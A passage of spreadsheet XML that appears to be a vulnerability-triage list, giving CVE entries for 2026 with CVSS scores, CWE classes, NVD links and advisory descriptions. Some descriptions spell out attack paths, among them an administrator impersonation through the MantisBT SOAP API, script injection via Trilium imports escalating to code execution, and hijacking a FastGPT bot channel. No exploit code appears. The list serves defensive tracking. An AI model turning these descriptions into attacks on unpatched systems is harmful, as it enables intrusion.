      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr"/>
      <c r="Q95" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87654</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39975</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr"/>
      <c r="Q96" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web-based IT service management tool. Prior to 3.2.3, unauthenticated users could delete the .readonly file on iTop instances, leading to code execution. This file, created during the setup process, prevents users from performing write actions. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39975</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16876</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>psirt-info@cyber.jp.nec.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr"/>
      <c r="Q97" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>An authentication bypass vulnerability exists in the WebGUI of Series UNIVERGE IX-R/IX-V. A user could bypass authentication and execute arbitrary CLI commands by tampering with WebGUI messages and sending them to the device via internet.</t>
        </is>
      </c>
      <c r="S97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16876</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47156</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr"/>
      <c r="Q98" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-639</t>
        </is>
      </c>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>MantisBT is an open source bug tracker. Versions 2.28.3 and earlier contain a critical authentication bypass in the SOAP API's mci_check_login() function. Any user knowing any valid cookie_string can authenticate as any other user (knowing their username), including the administrator, without knowing the target's password. The vulnerability is exploitable with zero prior access on default MantisBT installations because self-registration is enabled by default ($g_allow_signup = ON). A self-registered user can use their own cookie_string (readable from their browser's MANTIS_STRING_COOKIE cookie after login) to impersonate the administrator via the SOAP API. The REST API is NOT affected. The REST API's AuthMiddleware derives the username server-side from the API token or session cookie, so the username cannot be spoofed. The Web UI is NOT affected. The Web UI authenticates via PHP session cookies (PHPSESSID) and validates the MANTIS_STRING_COOKIE against the logged-in user through auth_is_cookie_valid(). The username is derived server-side from the cookie, not supplied by the client. Version 2.28.4 contains a patch. No known workarounds are available.</t>
        </is>
      </c>
      <c r="S98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47156</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48996</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr"/>
      <c r="Q99" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter does not sanitize note titles, and the GeoMap note view interpolates a marker note's title into raw HTML that is rendered as innerHTML, allowing an attacker-supplied import archive to inject script that runs when the map is displayed. Because Safe import neutralizes scripts but never escapes titles, a note whose title contains an HTML event-handler payload survives the import and executes as soon as the victim opens the GeoMap that renders its marker. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="S99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48996</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51106</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr"/>
      <c r="Q100" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-502</t>
        </is>
      </c>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>An issue in TokTok qTox v1.18.4 allows a local attacker to cause a denial of service via the src/persistence/serialize.cpp component</t>
        </is>
      </c>
      <c r="S100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51106</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53578</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr"/>
      <c r="Q101" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter sanitizes HTML only for text notes and excludes the mindMap note type, whose JSON content is stored without sanitization, allowing an attacker-supplied import archive to embed a payload that renders as arbitrary HTML. A mind map node can carry a dangerouslySetInnerHTML property that the Mind Elixir library assigns directly to a node's innerHTML, so a malicious note survives Safe import and executes script as soon as the victim opens the imported mind map. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="S101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53578</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53579</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr"/>
      <c r="Q102" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter sanitizes HTML only for text notes and excludes the book note type, whose content is stored without sanitization and later rendered as HTML, allowing an attacker-supplied import archive to embed a payload that executes as script. A book note's content is routed through the same rendering path as text notes and injected into the page with jQuery's html method when the note is shown as a grid-view preview card, so a malicious note survives Safe import and runs as soon as the victim opens the containing note. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="S102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53579</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53670</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr"/>
      <c r="Q103" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>PREVAIL is a Polynomial-Runtime EBPF Verifier using an Abstract Interpretation Layer. Prior to version 0.2.4, in the Prevail eBPF verifier, EbpfTransformer::add() silently skips offset-variable updates when the destination register carries a non-singleton typeset (two or more simultaneously possible pointer types). Subsequent bounds checks use the stale offset and accept out-of-bounds memory accesses, so a crafted BPF program passes verification even though it would corrupt memory at runtime. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="S103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53670</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53671</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr"/>
      <c r="Q104" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>PREVAIL is a Polynomial-Runtime EBPF Verifier using an Abstract Interpretation Layer. Prior to version 0.2.4, the abstract transformer in prevail treats writes through a T_CTX-typed base register as a silent no-op: do_mem_store in src/crab/ebpf_transformer.cpp only models T_STACK stores, and the checker's T_CTX bounds arm never tests AccessType::write. An attacker can craft an eBPF program that overwrites a context field (e.g., ctx-&gt;data), reload that field typed as T_PACKET, and dereference an attacker-controlled address — and prevail will report the program as safe. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="S104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53671</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55220</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr"/>
      <c r="Q105" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>Pimcore is an Open Source Data &amp; Experience Management Platform. Prior to 11.5.19, 12.3.10, and 2026.1.6, Pimcore\Model\DataObject\ClassDefinition\Data\Hotspotimage::getDataFromResource() in models/DataObject/ClassDefinition/Data/Hotspotimage.php passes the field __hotspots object-store column to Pimcore\Tool\Serialize::unserialize() without an allowed-classes restriction after JSON decoding fails. An attacker with a separate capability to write crafted PHP serialized bytes into that column can instantiate available classes and trigger magic methods when an affected DataObject is loaded, which can produce arbitrary file writes or code execution through bundled gadget chains. The related ImageGallery, Block, and Video callers use the same fallback pattern, but the identified June fix changes the Hotspotimage caller only. This issue is fixed for Hotspotimage in versions 11.5.19, 12.3.10, and 2026.1.6.</t>
        </is>
      </c>
      <c r="S105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55220</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55378</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr"/>
      <c r="Q106" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>JS Recon is a JavaScript enumeration and SAST tool. From 1.2.1-beta.1 until 1.3.1-beta.2, the PR Branch Checker workflow in .github/workflows/pr_checker.yml places github.head_ref and github.event.pull_request.head.repo.full_name into BRANCH_NAME and SOURCE_REPO and interpolates those untrusted values into a shell gh pr comment command. A remote user who opens a pull request can use shell metacharacters in a branch or fork name to execute commands in the GitHub Actions runner with the workflow's GITHUB_TOKEN, which has pull-requests write permission. This issue is fixed in version 1.3.1-beta.2.</t>
        </is>
      </c>
      <c r="S106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55378</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57910</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr"/>
      <c r="Q107" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-347, CWE-494</t>
        </is>
      </c>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in the WatchGuard Agent allows an unauthenticated attacker with network access to cause the agent to execute arbitrary code with elevated privileges.</t>
        </is>
      </c>
      <c r="S107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57910</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63310</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr"/>
      <c r="P108" s="5" t="inlineStr"/>
      <c r="Q108" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-5wp5-5229-5g6q. This link is maintained to preserve external references.
## Original Description
NLTK before 3.9.3 fails to verify file integrity after downloading packages and before extraction in the downloader module. Attackers can perform man-in-the-middle attacks or DNS poisoning to inject malicious package contents that are extracted without validation.</t>
        </is>
      </c>
      <c r="S108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63310</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65641</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>support@hackerone.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr"/>
      <c r="Q109" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>A vulnerability allowing an unauthenticated network attacker to coerce SMB authentication from the service account.</t>
        </is>
      </c>
      <c r="S109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65641</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68929</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr"/>
      <c r="Q110" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>FastGPT is an open-source LLM platform for building AI applications on a knowledge base. In versions prior to 4.15.2, the WeChat (iLink) share-channel endpoints authorize requests using only the public shareId, with no authenticated identity or team-ownership check. As a result, an unauthenticated attacker who knows a victim team's shareId can take that team's WeChat bot offline or hijack the channel to their own bot: the logout endpoint is gated only by an existence check yet wipes the outLink's stored WeChat token, and the QR-code status endpoint performs no authorization at all and writes attacker-supplied bot credentials into the outLink identified by shareId. By generating a QR for a victim shareId, scanning it with their own WeChat, and calling the status endpoint, an attacker binds the victim team's app to the attacker's bot, exposing the app's private responses, displacing the legitimate binding, and consuming the victim's resources. The shareId is exposed in every shared chat URL, iframe, and embed, so it is not a secret. This issue is fixed in version 4.15.2.</t>
        </is>
      </c>
      <c r="S110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68929</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
